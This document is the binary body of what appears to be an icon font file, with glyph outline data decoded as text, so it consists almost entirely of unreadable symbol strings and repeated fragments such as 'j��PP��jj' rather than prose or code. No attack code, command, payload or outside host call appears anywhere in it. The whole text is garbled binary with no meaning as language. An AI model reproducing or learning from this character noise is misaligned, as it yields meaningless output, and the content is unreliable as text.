?#6a���'3?C2>54.#"2#".54>32654&#"32654&#"!!j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%��@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�e@���#/"32>54.!5!2#"&546!2#"&546j��PP��jj��PP���@%%%%��%%%%�P��jj��PP��jj��P�@�%%%%%%%%���'3?Qb2>54.#"2#".54>4632#"&%4632#"&&"3>5&'!62#.56j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%$P b\B.L"��P b\B.L@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�P"@& "P"@& ���+S"32>54.2#"&546!2#"&546"&'.5#.56762467627&j��PP��jj��PP��V%%%%��%%%%� b\B.L"PP"K/B\b�P��jj��PP��jj��P�%%%%%%%%�Y$$"@& "$$" &@"���'+7C2>54.#"2#".54>'4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�@�K5%%%%�%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�L�L�%%%%%%%%���+0"32>54.2#"&5464632#"&'%j��PP��jj��PP��V%%%%�[%%%%K��K�P��jj��PP��jj��P�%%%%@%%%%�5L�L����'3I^2>54.#"2#".54>#"&54632"&'&""'&4762#!"&'&""'&4762j��PP��jj��PP��jV�qAAq�VV�qAAq��K55KK55K�6

		"j"		@6

		"j"		@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��B^^BB^^
		

!!

		

!!

���(4I"32>54."'&4762#"&'&""&54632#"&'&""'&4762j��PP��jj��PP����

		"j"		6�5KK55KK�6

		"j"	�P��jj��PP��jj��P��		

!!

��^BB^^BB^�		

!!
���/=GKUt�.#&3265<1.'"32>54.3!267#"&'7546;#"&533532#>=4&#!".54>32"032654&'>7>'.n+



	%%4�j��PP��jj��PP����	
�
	8�OO�8	pp	��@p		H/!� !/08Aq�VV�qA8�+4%%	



�




	
%%$0P��jj��PP��jj��P��0880H`	�		���	`		
`!//!`
	8�OV�qAAq�VO��

0$%%
	


���	
+Faq;5#"73#%#326=4&"32>54.>7>36#"&5<%>20#"&5467.'.#!"&=463!2	pp	���0pp		�j��PP��jj��PP��*4+



	%%��
+4%%	


B/!� !//!�!/0`	�		���	`	�P��jj��PP��jj��P��$0




	
%%e



0$%%
	�5!//!`!//!	���'5C^lz��2>54.#"2#".54>#"&546;2!#"&546;2"&'.#""'&47>32"&=4632"&=4632%"&=4632"&=4632j��PP��jj��PP��jV�qAAq�VV�qAAq�v�

�
�3�

�
�%!!%

		MM		z






�3






@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��







�(		




@

@
�
@

@
�
@

@
�
@

@
���!/=Xft�"32>54.#"&=46325#"&=46327#"&546;2#"&'.#""'&47>327#"&=46325#"&=46327#"&546;2j��PP��jj��PP����







 �

�

%!!%

		MM	�







 �

�
�P��jj��PP��jj��P� 

@

�

@

`



�1		


e

@

�

@

`



@����>J�54&#".#".#"54&#"'.#"21#"3!26=4&+7>5#"&546325!.546322127>54632326546323265463232654632�8(


+!

!8((8�
(8�-

�

,I@



T����
�













`�(8

�(88(�u^8($
�
�

�
��


��	
w�

��







 



�>J�%32654&'>54&'>54&'32654&#!7>54&#""154&+";26=3%"&546323'>3213!2#!"32#"32+"32+��(8

�(88(�u^8($
�
�

�
��


��	
w�

��







 



�8(


+!

!8((8�
(8�-

��

,I@



T�"
�













@����>J�#"&'#"&'#"&'#"&5#"&54672417#"&=463!2+4&#"326'!32672617623265463232654632326=46323265�8(


+!

!8((8�
(8�-

�

,I@



T����
�













 �(8

�(88(�^8($
�
�

�
�


����
w�@

@







 



�>J�%#"&5467.5467.5467#"&5463!'.5463221546;2+"&=#%2654&#"#7.#"1#!"3!2#"32#";2#"3`�(8

�(88(�^8($
�
�

�
�


����
w�@

@







 



8(


+!

!8((8�
(8�-

��

,I@



T�"
�













����!/	!5"3!26'1.#1#"&54632'"&=4632����
�K%3f3%�K
@%%%%@%%%%c��W]��,@@,g��%%%%e%�%%�%���(=AE"32>7>54.'.#512#".54>3#3#*PKD--DKP**PKD--DKP*j��PP��jj��PP��*����`-DKP**PKD--DKP**PKD-`P��jj��PP��jj��P�@�������8M3#2#575!57"32>7>54.'.#512#".54>���%������*PKD--DKP**PKD--DKP*j��PP��jj��PP���@%��@�@��-DKP**PKD--DKP**PKD-`P��jj��PP��jj��P���#!4&+"!"3!;265!26=4&�
�
��

`
�
`
@`

��
�
��

`
�
@@3!26=4&#!"
�

�@
 �

�
���-A46;2+"&5!535#533"32>54.".54>32�  ��@@�@�j��PP��jj��PP��jV�qAAq�VV�qAAq�� �P@�@��P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA���'3"32>54.".54>32'77'7j��PP��jj��PP��jV�qAAq�VV�qAAq�J��`��`��`���P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA���`��`��`�����(4A.#"32>7>54.'>32467#".5j$T\c33c\T$$8&&8$$T\c33c\T$$8&&8$&!��/q>O�i<�&!/q>O�i<*$8&&8$$T\c33c\T$$8&&8$$T\c33c\T$��>q/!&<i�O>q/��!&<i�O����S%81	81>76&/.81	81.'&81	817>781	816?>'.���7�	���	�7���	77	��77	���7�	���	�7���	 @	'	`� ���@� ���*V
%7	''��s�������!Y�R�Y*����������X�Y�X@����
048>334&+"33#%5#";5#54&+326=4&#26#535#53	7��@&�&@��@�&&���&��&@�����`�R�`���&&�����@&��&@@``&�@&`&&ƀ@���@ F�.@���!5!55!3!%!#���@�������@@��@�����������@��@����5!5!5!%!#!!5��@�������@�@��������@���������'*"32>54.".54>32
j��PP��jj��PP��jV�qAAq�VV�qAAq������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA������'+/"32>54.".54>323#3#j��PP��jj��PP��jV�qAAq�VV�qAAq��ꀀ���P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA`��������'+"32>54.".54>32!!j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA`�����'*."32>54.".54>32%3#j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA����������'*.2#".54>2>54.#"%#3j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA����������'*-2>54.#"2#".54>'7'7j��PP��jj��PP��jV�qAAq�VV�qAAq�����@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�����������'*-"32>54.".54>32j��PP��jj��PP��jV�qAAq�VV�qAAq��������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA@��@���@@@	����@�����@�@!!!!�@���@��@���@�@!!��@��`� @@���� ��@�@@��`�`` %��@``@�����@���@�@73��@@����@��@��@�@@��@���@�@#������@@@�`��@�����@��`@�@%3�@��@��@�@@��@@@#���@@�`�����`@@7!!	!�����@~#C\w%"&'&47>54.'&4762#'"&'&47>4&'&4762#1'"&'&47>4&'&4762"&/#"&546;7>z	!3""3!((=))=(	�
1111'/  /	�	(,--,��s

s�			&(!LSZ..ZSL!(([el88le[(Z'2{�{2'GMT++TMG[(MPM(,qtq,��
@
�
��
p~8S%"&'&47>4&'&4762#1'"&'&47>4&'&4762"&/#"&546;7>�
1111'/  /	�	(,--,��s

s�			�'2{�{2'GMT++TMG[(MPM(,qtq,��
@
�
��
G~3%"&'&47>4&'&4762"&/#"&546;7>%	(,--,��s

s�			�(MPM(,qtq,��
@
�
��
�~%"&/#"&546;7>��s

s�			�
@
�
��
�~*#'#57'5373"&/#"&546;7>�UkkUkkUkkUk�K�s

s�			UUkkUkkUkkUk�@�
@
�
��
~&##5#53533"&/#"&546;7>���������s

s�			��������
@
�
��
~!!"&/#"&546;7>�`�s

s�			����
@
�
��
���!	!3!5	5!#�����������������������2.#"34>32!#".'7!732>5z#U`j8j��P`Aq�V.WOE�`�&Aq�V.WOE����#U`j8j��P&>+P��jV�qA$3 �`���V�qA$3 ����&>+P��j��';P%"&/#"&'.5467>327>32'3267>54&'.#"%"326?'.#0X"ff"X00X""$$""X00X"ff"X00X""$$""X�5555g��555gg5�$"gg"$$""X00X""$$"gg"$$""X00X""$�55f�55ff���`%#'737'#"'.+3#326?;7'e��e��
	��	
������
	��	
��������
	��	
����
	��	
������7	7	! ��� ����  ����	!!!�  � �� ����		 ��� ����� ������	!!� ���������		!���� ���� �� ����!!!���� �����	'	� ��@ ���  ���!! ����  � �@m@!%32654&#!"1326=326764m���%%��!%%		�%%
��%%��
		
6�mm	&"2?3265326764'm��6��6�%%�		-@��6��%%e�
		
6�S�@"732654&'.#1!";27�%%
��%%��
		
6S�%%�!%%��		@S�-%64'&"!"3!2m@��6��%%e�
		
6S@6@6�%%�		�@�@"#"3!267>514&#".#"��%%�!%%��		��%%
�%%�
		
6�m�	"'&476246327>32m��6��6�%%�		S��@6�e%%���
		
6�@�-"	54&#"31!2654&+>54&'&"��%%
�%%�
		
6-���%%��!%%		SS�-%&4762!2#!"���@6�e%%���
		
6S@6@6�%%�		���'-32>54.#"#".54>327	7P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�Z���Z��j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z����'-"32>54.".54>32'	j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z��P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA�ZZ����'-4.#"32>%4>32#".7	'P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA�ZZ��j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z����'-2>54.#"2#".54>'	7'j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z�@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�Z���Z����3#!3#!!'7%!5!5�@@�@@@@��@����@������@�������@�
"&*.33'3#73#73#3#73#73#'3#%3##5%!!�@���� ``�``�@@�@@```�``�@@@@���@������@@@@@`�`@@@@�`@`��@��@�
"&*.##7#5%!!3#73#73#3#73#73#'3#%3#@��������@��``�``�@@�@@```�``�@@@@��������@���@@@@`�`@@@@�`@` ����%@D%##7!"&'&47#"&5463!232#.#"326?37>'%7#@������	��

	��

]�		�		7�7	��LL�����	N

	��

n�

��		nn	��� ����%@C%##7!"&'&47#"&5463!232#.#"326?37>'%7@������	��

	��

]�		�		7�7	��LL����@	N

	��

���

��		nn	��� ����26%##7"&5#"&546;2#";#";2654&3#@�����
 

@
3�

��

�
�������@
`


��
�
�
�


�
@� ����26%##7"&5#"&546;2#";#";2654&3#@�����
 

@
3�

��

�
�������
`


��

�
�


�
@� ���
%##7'!!!!!!3#@���� @����@@��������@�@�@� ���
%##7!!!!!!3#@���� @����@@���������@�@�@��@�@/:EIT_%"&=##"&546;5#"&54632354632+3232654&#!"326=735#732654&#"%";54&�B^�^BB^^B``B^^BB^�^BB^^B``B^^�8((88(�@(88((8@���`(88((8��(88(`8@^B``B^^BB^�^BB^^B``B^^BB^�^BB^`(88((88((88(`@�@8((88(`8((8`(8�@^7(%!"&5#"&'&6762+%!46;'32���
�
@

@
���
S��S
@
`		@		��		��
@`
��
�@"&/'.7>32���	

	�

�	
��
		
�
	@��&%!"&'!"&5463!232#!"&5463!2��	���

@	��

��

@
�
	-


	��

@



���!"3!2654&'7��5KK55KK��Z�3Z�K5�5KK55K���Z�2Z���!"3!2654&!!��5KK55KK5��K5�5KK55K�����'3"32>54.".54>324632#"&j��PP��jj��PP��jP�i<<i�PP�i<<i���pPPppPPp�P��jj��PP��jj��P��<i�PP�i<<i�PP�i<�PppPPpp���"32>54."&54632j��PP��jj��PP��j5KK55KK�P��jj��PP��jj��P��K55KK55K���'"32>54.".54>32j��PP��jj��PP��jP�i<<i�PP�i<<i��P��jj��PP��jj��P��<i�PP�i<<i�PP�i<���7'!5##3!3535#!@�@��@�������@��@@��@�����������@@�����#37Gm�#";26=4&326=4&+"73##";26=4&#53%#";26=4&7#"&'.=4&#!";23!2654&#!"&'.=4.+"&'.5467>3!2;2@�&&�&&f�&&�&&�����&&�&&���&&�&&&@@u-.0K5�5KK5@@u-.0K55KK
		
�
		
<i�P@
		

		

		
<i�P@
		
@&�&&�&�&�&&�&����&�&&�&��@&�&&�&�0.-u@@5KK5�5K0.-u@@5KK55K��
		

		
@P�i<
		

		

		
@P�i<
		
���/?OSW[_cgkosw{��+"&=46;2+"&=46;2+"&=46;2+"&=46;275#'#37353#3#3#3#3#3#3#%3#'3#'3#3#73#%3#'3#�``@``��``@``�p0pp0pp0pp0�@@@@@@@@@@@��@@@@��������@�������������```�````p0pp0pp0pp0��@����@���@��@@@@@�@@@@@@@.��9Ua}.'>'./.'.>767>&81'.'&67>7>"&54632&'81.'.7>76�AFDP�
��
�PDFADFA��AFD�@44�


s44'8| 0'��T'0��|8''RK=7'��'7=KRQ$$6#$6 



��$$6$#6���B"326554.>7>32#".'.'.'>7j��P�K55K�P����2!KQW,,WQK!22!KQW,,WQK!2�,:!`����%%@�`!:,�
				

				
e����%"&#"3.54670
!37#73267 DhFq�m5IH
eJ KxY=l�,�4-U&.P=�;a}AM;&7�o����#��	7k	��f�a%81#5467>7>323267>54&'.'.#"#3+!5#"&58132!5"&5��	





':.S$$8~~	&�D1�8%&E!X�=n

(

"
<&#w<H��6(
88&SN&,�,$
88A�\�v%"&'.5461.+"#"&#"+";21#">326&#"&'.'546;>54&+"&=4>3281#">326&#WL
@#,!EgC!<NI
-F-*G,L�
�%5"/GI
-F-*G,+@$=C!"6`�P.1]I,<%$@$�!
51YD(Pv�L<%$�	%3'3#7#%'#3!53#����������@������@���������@@@��@����	%'7!55'#3!53#����@@������@@��������@���@@@��@���@!######5!@������������������@�$>54.#!!2>54&32+#32� (F]5���5]F(D��e*<<)f���,>>�"T/5]F(��(F]5FtFK55K��K55K�@�3#".533267>5!!��2WuBBuW2�I((I������`<iN--Ni<��`88������#3!53#5������@�@��@�@@@�=##"&'.5332654&#!5!.'.5467>32#4&#"32�50,q>>q,05�rNNrrN�,0550,q>>q,05�rNNrrN;n+�@A"5b$!$$!$b54LL44L@$b55b$!$$!$b54LL44L!���3%!7!5>54.#"!!5.54>32�@��1R<!7`�II�`7!<R1��@FvU/P��jj��P/UvF@���H_p>P�g;;g�P>p_H��!Sl�G]�zFFz�]G�lS���%73!5	5!#'.#!	!26�,&@�@L���,"6:�ja��WB�_��J�L�'7"����8���#3#73#%3#73#%3#!3!!#!������������� ��@ ���@@@@@@@@@@�@��������@�����3#575#53#'#	373�����܈����������2@�<2@�n����������%3#575#53#'#	373�����܈���������22@�<2@�R������P��
@?!3#33#7#"&546;2654&+";2+";2654&'.�::r��r�H:�:d���@

�

�(8

%@

�

�(8

%�����������



8(!




8(!
P��
@?!3#33#7%#"&546;2654&+";2+";2654&'.�::r��r�H:�:����@

�

�(8

%@

�

�(8

%������������



8(!




8(!
��0%7!3#33#B::r��r�H:�����������"!#!!3!%3#'3#%3#73#%@����@��@���������������@���@����@�����@@@@@@@�����7!!!#!5!''7'77@����ѷ�����"��>��>��>��@���@�����>��>��>��
@#'!5!!5!5#!5!!%!!=!!!!5!����@���������@��@��@������������������
�#'!5!!5!5#!5!!%!!5!!!!5!����@����������������@��������������������#'/37?CH3#73#%#535#53#73#%3#33#73#%#535#53#73#%3#3!!1!������@��@�@�������@��@�����@��@�@�������@������@�@@@@�@�@�@@@��@@��@@@@�@�@�@@@��@@@���������!####".54>�����5]F((F]�������(F]55]F(���"333335	5]F((F]5�������(F]55]F(�������@���"333335	5]F((F]5������(F]55]F(���������������"&'.5467>323267>54&'.'.'.5467>7.'.5467>321#"&'.5467>54&'.#"#>54&'.'.'�%>
	

		
	4%<P-	
F(&?

	




,?X-		E)2$#

:+!%$
6($@2
	
				

-)F58) &$>1
	

	')K!47*
%%?�23
2!/�!!!!!!!!!!�����������@���@����!!!!!!!!!!�������������@���@����!!!!!!!!!!��������������@���@����!!!!!!!!!!�������@�@�@�@��!!!!!!!!!!����������������@�@�@�@����!!!!!!!!!!%�����������������@�@�@�@�����@@
0>3	"!3>7>7!!S�z���`�`0���~!O,�F@�@<H<��7Zs��	/��
V@��
!!!'!'7�@����@ @�@��`�����@���@��@���`��� ��%	%'	7'@`@��`�`��@`��`@@`��`����`� W�)%	%'	7''@`@��`�`��@`��F�F�`@@`��`����`�i�@�#!!!!!###53535#5#5333#53@���@��@@@@@@@@@@@��������@��@@@@@@@@@@�@���3"%>54&'%32654&#".#"326732654&`";�Q�;"B^^BB^�Q;"B^^B";�^BB^^�

�^BB^^B
�^BB^�
B^^BB^���#/9!"3!2654&!2	>3<5.5!"&'77#7'7U�VGddG�Gdd�d
���
@��@�	�ZZ�	@���dG�VGddG�Gd���I�@�ۺ	@�ii�@	�������+!"3!2654&2	>3!*#'	'*#!U�VGddG�GddG������V�������V�dG�VGddG�Gd���-�9�c�0��������!"3!2654&'7	7U�VGddG�Gdd�N�II��I��dG�VGddG�Gd��N�����
�Z��0����'2<"32>54.!2	>3<5.5!"&'777'7j��PP��jj��PP����
���
@��@�	�ZZ�	<���P��jj��PP��jj��P���I�@�ۺ	@�ii�@	��������-gu%#".'&632>767&&76&7>'%3>76&'.=4&'.#"267>32326767#"&5463�*elo5J��s2
	6x��E.aca/.]1|		-

��9	-$i-,YL8

x8#'
5�2:JkNAW3|-#(uBK0 2H-2#

5!z%XJ1	0+�=m*",H7

&$0eK``&4!-$? 2'O-
����,!#".54>327.#"32>54&'
##DkLAtV22VtAKe�!MV_4j��QQ��jo��G	�LD03WvCCvW33�2#P��jj��PJ��m)���9!"3!2654&".54>32.#"3267#5!#���(88(@(88�@P�h<<h�PM�2hK82VA%%AV2ra�j5`�S�8(��(88(@(8��<i�PP�i<5/e&&BX22XB&{*�R�c8���="32>54.".54>32.#"3267#5!#j��PP��jj��PP��bP�h<<h�PM�2hK82VA%%AV2ra�j5`�S�P��jj��PP��jj��P��<i�PP�i<5/e&&BX22XB&{*�R�c8�)53#".54>327.#"32>54&'!%#5##3353F�Ra*I7  7I*/@X+mBDvY33YvDFtR-���``````�p$i!7K++K7!!U(-3YvDDvY3/UuF
	`````���5A!"3!2654&".54>32.#"3267#53###5#53533���(88(@(88��5]F((F]54V"F3%B]]BLA��#A[7@@@@@@�8(��(88(@(8�(F]55]F($C_CC_SX

7\B%@@@@@���9E"32>54.".54>32.#"3267#53##5#53533j��PP��jj��PP���5]F((F]54V"F3%B]]BLA��#A[7�@@@@@�P��jj��PP��jj��P�(F]55]F($C_CC_SX

7\B%@@@@@@F����%"3>54.##5#53#5#53\�xEIz�We�t>Ex�[@%��@%���Fx�[W�qB�3���U[�xF�(8`��(8`���!'!	��E����(���޹"@��@@���	������35#"#3337#546`��.R=#���� ��#=R.`���`
���#!"3!#53546;#"3#!2654&���(88(���qO��&� � (88�8(��(8��@Oq�&@��@8(@(8���+H!"3!2654&46;2+"&52#"&5461#!"&51332>54&'3���(88(@(88��
�

�
�OqpPOqp�
�@
F2WuBBuW2F�8(��(88(@(8�

�

 pPOqpPOq��

� BuW22WuB!����?�.#"%31812>54.1"&/7'.54>32#.'&"'.'.'&67>7>76&'.'.#&"#"7>7>'.'i$S[b3i��P""H
7{@i��P&7�u9m1�+
 !Cr�W+QLE. Cr�W�	D		
	
8$$
	$/!8N0$(;
+$8%P��iC�:��GP��i3b[S�	)�2s<W�sB.ELQ+W�rC<!
	" 6			G		2//N-<?

#"���)@V"32>54.'.&'&67>7'.&'&67>7.&'&67>j��QQ��jj��QP���-fq{D
I�}q2
8
4~��<F���<	
=���;"D���G
	
(�Q��jj��QQ��jj��Q�!


&�
		 )
.% 
�%)

"/*
(
	���)"32>54./#"&/&67%6j��PP��jj��PP���T�=

,~��P��jj��PP��jj��P���t
	_<�'
�@G>7.#".'.'#"&'#"&'32>54&5>7= !0C$P-+M9!A{n`'
3*1aH


kE6�J
#LQV,�ߘN5�
<%$!9L,"9N066\Lt>R*0#
m��h
7 ?����@#".5463207>54.#".'#27>72675�&0T>#)%
CQ9U78Y> 0F,%[1,SF7�nug0HTU ? �!@\::;66?@&^,;\@!)Hb:8hXFJ16��׋���aBa{Dz���o!"3!2654&0"'.101#0&'.10&7>1701076&10&'.#&67>3267>106761702���(88(@(88�]0*p="<.e"	-	
 #	j  5,*+�8(��(88(@(8�3C:?#_V<	26 ^%6:,	;65+G)''
���!2>53.53267.'�Z�rA-CoQ-�Z�rA-CoQ-Y.@N-7|BC|6,O@.�Z��_/ZSL! g��UCZ��_/ZSL! g��UC��1[QE!!EQ[1�9:Up}��%.'&>76.7>'&076&'.32>54&'.17616716&.7161676&''.7>'.7>7&676&�?sY8)Nm?@sY7)Nl

~NJ[e1$8'Ky�Ph�zBP,�2�E0c$$�D!

!
�e7.
-
><y.=@�7>/E)*N?+/D**N?+k5#!'>$E0$JIG"?eF&7Uf0;D
68+
((e/B�%


! F�E	((�556i7::g���*7"32654&234.#234$#�8PP89PP�0\VO""4#�j����-�š����P88PP88P��#5""NV]0���j\ă�ҫ�u����)5!"3!2654&"&546324&'.#52#34.#52���(88(@(88�O$33$$33�.++p=Y�uD~�S��m��g�8(��(88(@(8��2$$33$$2=p+,.}Du�Ym��S}g��X(;?0&'.'."90"1010102>7>7>106=4&1
�;5~kHHk~5;

CtsVHk~6:

�����NNh>N>gO
Og>N>h�� ����
	�=e���� Cg�0417#*054&'.1&"#"7>5>=7>7>7>57'./##16?2?57.'.67>7>7>54&''.'.467>%3'4&'.#"3%.#7>7>5.'%.'.'.'&22>72>7263>7>7>76&'%"&'0&4&5'5##54&#"&'.=37>?3&'.#"#33067>76%&'.5467>7>3267>?3X/ 	
E"
5
\

)�	
^0
K^�!H"!6
 ,l	
	.��

5B.Pk|>k���""0�{T)*szu-OK;
#1(		
��5.h25ET

-
T
TG-TT '	
b	-!.X)"

%A�	
	VRL$3H22G+�:
"
GM>4M�))
R����
2��خ?
	�a(*1JrA"$
BFY/
��
K[U1Q6:	�)E^		��/^a*�RJ"-0
R8@���B9O	K/,�YKd@(��.Mf:YX���
	
C��ƒ7w��

�k,?
"&:m�5a -	
%(2mY0#-$ '=I14)
!����	!373#5#!3#3#``��� �������``�``��� �� `�ࠀ�@���z:#"&'.'.#"'>7>763267>76&#">4M24aXP%,L)1(#0&K%2L<J&0  #"(&7HZ5OJ�%YftADfD"SRL�KSS>"B"+.QX^uON332N,,	>\<fd���H!"3!2654&#"&'.'.#"'>7>763267>76&#">���(88(@(88j%8$&F@: 7$#6%6+5
#hM96�8(��(88(@(8��@JT/1I1<;7n6<<-0";@DU98$%%8 YWJH���,!"3!2654&&'.'&67676���(88(@(88���<%XXD#K�$
		�8(��(88(@(8��rTQTF/N>m@�N,,&��'4>32#".%4>32#".#=R..R=##=R..R=#@#=R..R=##=R..R=#�.R=##=R..R=##=R..R=##=R..R=##=R�� 4"32654&'12#".54>4>32#". 5KK55KK5.R=##=R..R=##=R�#=R..R=##=R..R=# K55KK55K`#=R..R=##=R..R=#�.R=##=R..R=##=R���'!"3!2654&"&54632!"&54632���(88(@(88�XB^^BB^^~B^^BB^^�8(��(88(@(8�`^BB^^BB^^BB^^BB^���+"32>54."&54632!"&54632j��PP��jj��PP����B^^BB^^~B^^BB^^�Q��jk��QQ��jk��Q�`^BB^^BB^^BB^^BB^���$8Rbq�".54>32#.>7.'*3267%>7>7.'#12>7.'>7.#"64&'1j��QQ��jj��QQ��j�0I^4%>1!��!]�Q&7�L-V(�0Y�T	
R�|Q*gGn�L6-.O?+F .6tk:�S4� ;Y=6iT85-@Q��jj��QQ��jj��Q�
;iS7
?KT.��?Wl; YS?+1nH[\&*PJC~
0WD,?O\3P-DX1+j	3;�$29 	N�8q�'<R���2#!!267>54&'.'.'.+267>7>7>54&'.+3%3267>73#"&'.'.'.5467>7>7>32!7.#"3.''!!))

 +
		$)��)			��
	

$���)!
n
(B'0%			$03$���%
		����
		%(3*v�			���

#

�
	


);		&10&		
+30�
$�>���+;?g��>54&'.'.'.+3267.+3267>7>7>54&'!"3!2654&3#+32%!3267>73#"&'.'.'.5467>7>7>32'"3.'.#�
		ir
zx
	���(88(@(88���Ё

"��"
			#���!Z!6'
&)�

�
		�		xl	�

-8(��(88(@(8��3��		

 

)!O'	"/

('

		
#)�


��=�5#!33?!5#'=�X�Ƭ��X:���������r�������!03267>7>7>54&'.'.'.#"1!2654&#!"6?>1>32#"&'5467>32#"&'&32>54.#"5.'&"173267>732676&/76&'.'.#""7>323267>'.'.#1.'&#"&'.'.'.'0&1.13267>706764'�$5A""B5%

$5B""CH�

�
$'d87d&'**&&f7%G44R;*J7  7J*)K�	!$	$&%%		%%R-[#$M$)O&9B'+[/C	A$%P))O%$A,
2  K)+[0/[+)K 6$





$6A""A6$




/�|


%'))'&d77c'&*�03;Q
 7J*)J6 E$�#3
8	"#
$%
%%
%%�

%		*�,,A#"0	
6*J  22 1�@5P\4632#"&7."1'&267>'7>7>4&'"&5<132676&/>32#"&54632�8((88((8� SVS  �(�E	�
'JNJ$�#A!!!!��8OC#	@8OO8�B^^BB^^�(88((88�!!!!A#��	{	Ez2h'$_/�  SVS ��O84		E2O88O�^BB^^BB^���KWc%2676&/>32#"&'2#!"&=267>'7>7>4&'."1'463!4&#"326%4632#"&0&
B	8OO86NH1GddG�VGdy%JNJ$�#A!!!! SVS  �/�dG�+^BB^^BB^�8((88((8|E,O88OK60DdG�VGddG�Q0_%$_/�  SVS !!!!A#��
�Gd��B^^BB^^B(88((88���7!'!'1%''%5�� ����@����� ��؈``�������������N��L^��^���+q%.5467>7>5467>7>376"&'1'.'.5467>7>7>5>7667>7>32#"'.&'1_-14$*#*5Fx(%
�׫�	�4

/
B2B		(-Ht	
-�>(9?	c
�E6&
	#6 GE;,,*.
)
:\	 
YI/ 
%3W:.	���W"65<'&1.1&61167>7.5467.70>32>17>54.#j��P4]�LjB'#'&("]+TB)CJA!!AJC)CS+L�]4P��j�P��jT��^
	6 T,2;
"
8^I*E	I51		15I	E*J]80#4L
_�Tj��P���!##!!�������������U8�">7>76&'.'.'.'.'.#".'.'&67>7>7>7>7>767>7>7>7>76F{iT#/	;$MNP()RRQ'Cx%	J`uD*YWT'8	"		$9
,+
)#*		
8�E8U5Xo9A�H			
'	
N=
	##E"<yfI
��/ 			<	<
9

	
++$L'	
	+$���/!"3!2654&+"&546;2+"&546;2���(88(@(88��&�&&�&�&�&&�&�8(��(88(@(8�&&&&��&&@&&���	DO_s�%4&'.5463:3.#":3261607'.1&603261607>53267.5>54&'"32>54.".54>32� 9O0��$3�K2^REH�T<IH�&�s7"@�
u+F2��j��PP��jj��PP��j]�zFFz�]]�zFFz��8fWE�#L)#1*(.4,>'�k���n}':4��
	
B(��DT_41Z(MP��jj��PP��jj��P�@Fz�]]�zFFz�]]�zF���7So627'..#"7'&47%4&#"&7627>'>56&/"/732654&'%"'&4?'32676?'
Ee+r8L38Q=..�e��Q84M:y.�e�Fe.2Eu,�e�Fe/z;	K29PD2���Ee,-<P91J8s,�e�f+
1BP91K
:z.�e�F�9PD2.�e�Ff.x:N4��8s+�e�Fe./?P94M��Fe,u8J19P=-,�e���9"32>54.#".'&6726323267>323j��PP��jj��PP���<Se77eS<~OO~	�P��jj��PP��jj��P��5Y@$$@Y5 MaaM
	���-;#"&'14.+"3!2>=4&%32+"&546!"&5463!2�:(4YyE�Ey[44[yEfEzZ4'�g�&&�&&���&&�&&@&EuU14ZxE��ExZ44ZxE�0�&&&&�&&&&���/?O!"3!2654&#!".54>;2;2'#!"&51463!2+"&5146;2���(88(@(88H'D[3��4[D''D[4~3[C'+�&�&&&�&�&&�&�8(��(88(@(8�x3[C''C[33[C'$AX3$�&&&&&&&&���@�13267#"&'.'.'.5#5>7>7>73!!@
&'9&!:9$0.�?"

���-5


�			#5#g�
,A(�����A!"3!2654&#"&'.'.'.=#5>7>7>733#3267���(88(@(88�)(! 
`,		
d��5�8(��(88(@(8��


%�d
-�~�%	pj����(1>7'.'"'9891758*jdS0/>NR""IGA*3**fcS@AsJ���
j��79xun/		?���'�M�����".'>32<5'"&#.'"&#8181"#"#=>7465>=.'.'.'.'.'.'./326?8181>7>?3267D��}<=|��DC��|==|���



$)*+)$

z	������"		����	W

)
'&&8'22'8&&'
)

=DFFD=���P~��%'.'&23267>'.%6.3>723267>7>7>7!.7%81&6768140581.81.'##*#.'.'#.'467>7>7>7>323'.'.'>5816&#"81.'<'81&676818>m'-F

V0
*g9CP����+�


<33J
 60&�3((>

 		G'9'#) %		
?/@" #%M78Q�

+_�ۍ���?"JNR*#F!	(%	
*]/&MQV0�>ZT>	#.5#
7 �!8

	+
.
f
'88'
GhdG ;�����(5467.'&#"&7>327>7>7".'>'67k-u<jY1Aq""
6! O21<;;;35H %!*3+� 'T#+R�a`B"5.E:;���//U(*N/6Y1O:|!V-+!V,+ ���(6esy������%8184018'818!"3!8181!2654&4632#"&5!.'01#".'.7>3267&656&'.+>7>7!"&=4632"#26:3*#7:10":3*%.>7>"#26"#269���&&��&&��



��2b\U%

!JPT,	_1!��


��`
7�G*QLH��
�%&��&&�&�

@

�` @ #3!

,Y|T2_�/�
@

@
��It
0;	$!.
�@����
6Yk~"32654&!"32654&31326=3326=265!%.'76&'&'.#"'.!5#%"&5463818123"&546381812#�&&&&��&&&&F8(&&�&&(8��>E5 	 -- 	 5E>��


�



@&�&&&&�&&&��(8�&&��&&�8(`@Bm#@	@@	@#mB  @







���*?O.#*>32>7.'3267#"&''2.'.#">381%#"&'3267'3�$E!	*I
Z.S%=[$		
